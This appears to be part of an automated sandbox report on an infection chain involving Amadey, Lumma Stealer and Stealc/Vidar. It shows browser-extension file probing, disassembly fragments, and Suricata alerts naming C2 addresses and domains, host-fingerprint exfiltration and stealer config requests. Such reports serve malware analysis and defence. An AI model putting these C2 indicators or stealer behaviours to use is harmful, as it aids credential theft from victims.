Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	14_2_032E1140
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 4x nop then jmp 06066C1Ch	14_2_06066A30
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 4x nop then jmp 06066C1Ch	14_2_06066A40
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 4x nop then jmp 0606CC9Bh	14_2_0606CAC9
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 4x nop then jmp 0606CC9Bh	14_2_0606C8E1
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 4x nop then jmp 0606CC9Bh	14_2_0606C8F0
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 4x nop then jmp 060EE9F0h	14_2_060EE938
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 4x nop then jmp 060EE9F0h	14_2_060EE931
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+05h]	19_2_0040A960
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov edx, ecx	19_2_00409CC0
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	19_2_0042A060
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]	19_2_00425F7D
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov edx, ecx	19_2_0041D074
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov edx, ecx	19_2_0041D087
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov byte ptr [esi], cl	19_2_0042D085
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov byte ptr [esi], cl	19_2_0042D085
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h]	19_2_00426170
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	19_2_0041597D
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	19_2_00416E97
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov edi, eax	19_2_00416E97
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov ebx, eax	19_2_00405910
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov ebp, eax	19_2_00405910
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	19_2_00425920
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov word ptr [eax], cx	19_2_004286F0
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	19_2_00417190
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov ecx, eax	19_2_00422270
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov byte ptr [edi+ebx], 00000000h	19_2_0040C274
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov eax, dword ptr [00444284h]	19_2_00425230
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	19_2_0043CAC0
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]	19_2_004292D0
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov edx, ebx	19_2_004292D0
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	19_2_0042AAD0
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then push eax	19_2_0040C36E
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx ebx, bx	19_2_0042536C
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi]	19_2_00402B70
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov word ptr [ecx], dx	19_2_00427307
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]	19_2_00436B20
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	19_2_0043DBD0
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	19_2_0043CBD6
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	19_2_00407470
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	19_2_00407470
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then jmp eax	19_2_0042B475
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	19_2_00419C10
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	19_2_0043CCE0
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh	19_2_0043DCF0
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov byte ptr [ebx], al	19_2_0042B4BB
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	19_2_0043CD60
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	19_2_004345F0
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]	19_2_00427653
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov byte ptr [edx], bl	19_2_0040CE55
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	19_2_0043CE00
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	19_2_0042A630
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h]	19_2_0042C6D7
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov byte ptr [esi], al	19_2_0042C6D7
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]	19_2_0042C6D7
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]	19_2_0042C6D7
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-41h]	19_2_004296D8
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh]	19_2_00415EE0
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov word ptr [eax], cx	19_2_00421EE0
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then cmp al, 2Eh	19_2_004266E7
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov word ptr [eax], cx	19_2_004286F0
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov word ptr [eax], dx	19_2_00417E82
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh	19_2_0043E690
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	19_2_00416E97
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov edi, eax	19_2_00416E97
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h	19_2_0041CEA5
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then add ebx, 03h	19_2_00428F5D
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]	19_2_00425F7D
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h	19_2_00414F08
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov ecx, edx	19_2_00414F08
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov word ptr [eax], cx	19_2_00420717
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then mov word ptr [ecx], dx	19_2_00420717
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]	19_2_0042BFD3
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]	19_2_0042BFDA
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h	19_2_0043DFB0

Source: chrome.exe	Memory has grown: Private usage: 6MB later: 34MB
Source: firefox.exe	Memory has grown: Private usage: 1MB later: 186MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:49835 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.7:49841
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49859 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49876 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057945 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.7:59797 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057983 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.7:59797 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057949 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.7:49908 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057981 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.7:49908 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.7:52701 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057929 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.7:62055 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057975 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.7:52701 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.7:52838 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057979 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.7:62055 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057973 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.7:52838 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49890 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057935 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.7:61907 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057969 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.7:61907 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057943 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.7:52464 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057971 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.7:52464 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49915 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.7:58590 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057977 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.7:58590 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49942 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49968 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:50000 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:50018 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.7:50011 -> 89.35.131.209:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.7:50018 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.7:50018
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.7:50018 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.7:50018
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:50029 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.7:50018 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058159 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fightlsoser .click) : 192.168.2.7:63259 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:50042 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057945 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.7:55070 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057983 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.7:55070 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057949 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.7:53787 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057981 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.7:53787 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057929 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.7:53417 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057979 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.7:53417 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.7:55746 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.7:51237 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057975 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.7:55746 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057935 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.7:50303 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057969 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.7:50303 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057977 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.7:51237 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057943 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.7:62706 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057971 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.7:62706 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:50057 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.7:50048
Source: Network traffic	Suricata IDS: 2057949 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.7:57063 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057981 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.7:57063 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057945 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.7:65511 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057983 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.7:65511 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057929 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.7:60755 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057979 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.7:60755 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.7:57433 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057977 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.7:57433 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.7:61261 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057975 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.7:61261 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057943 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.7:59311 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057971 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.7:59311 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057935 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.7:63849 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057969 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.7:63849 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.7:62082 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057973 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.7:62082 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.7:55846 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057973 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.7:55846 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.7:50041 -> 104.21.35.43:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:50134 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:50222 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.7:50218
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.7:50210 -> 89.35.131.209:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:50243 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.7:50446 -> 89.35.131.209:80
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49902 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.7:49928 -> 116.203.10.31:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.10.31:443 -> 192.168.2.7:49928
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.10.31:443 -> 192.168.2.7:49922
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:50041 -> 104.21.35.43:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50041 -> 104.21.35.43:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:50061 -> 104.21.79.7:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:50046 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50061 -> 104.21.79.7:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49887 -> 104.21.79.7:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49887 -> 104.21.79.7:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:50066 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.10.31:443 -> 192.168.2.7:50228
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.10.31:443 -> 192.168.2.7:50230
